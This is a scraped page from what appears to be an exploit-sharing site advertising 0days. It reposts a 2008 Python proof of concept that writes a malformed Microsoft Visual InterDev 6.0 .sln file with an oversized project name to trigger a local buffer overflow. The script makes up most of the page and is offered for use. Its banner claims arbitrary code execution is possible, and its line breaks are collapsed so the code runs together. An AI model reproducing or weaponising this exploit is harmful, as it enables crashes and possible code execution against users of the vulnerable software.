ZBC 0day Exploits

ZBC means Zcuu Bug Center.The main duties is Published Exploits and 0day. We have the fastest, latest and the best we to Published 0day.


您当前的位置:zbc exploitsexpdospoc → 文章内容 退出登录 用户管理
Hot
Near
Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC
Author:佚名  ComeFrom:不详  Time:2008-6-18 12:58:49

little big

#usage: exploit.py FileNameimport sysprint "--------------------------------------------------------------------------------"print ' [PoC 2] Microsoft Visual InterDev 6.0 (SP6) ".sln" files Local Buffer Overflow'print " author: shinnai"print " mail: shinnai[at]autistici[dot]org"print " site: http://shinnai.altervista.org\n"print " Execution of arbitrary code is possible, but it annoys me at the moment :)"print "--------------------------------------------------------------------------------"buff = "a" * 264 + "bbbb" + "c" * 256try: sln_file = \ 'Microsoft Visual Studio Solution File, Format Version 1.00\n'+\ 'Project("{}") = "' + buff + '"\n'+\ 'EndProject\n' out_file = open(sys.argv[1] + ".sln",'w') out_file.write(sln_file) out_file.close() print "\nFILE CREATION COMPLETED!\n"except: print " \n -------------------------------------" print " Usage: exploit.py FileName" print " -------------------------------------" print "\nAN ERROR OCCURS DURING FILE CREATION!"# exp.zcuu.com [2008-04-03]
[] [goback] [print]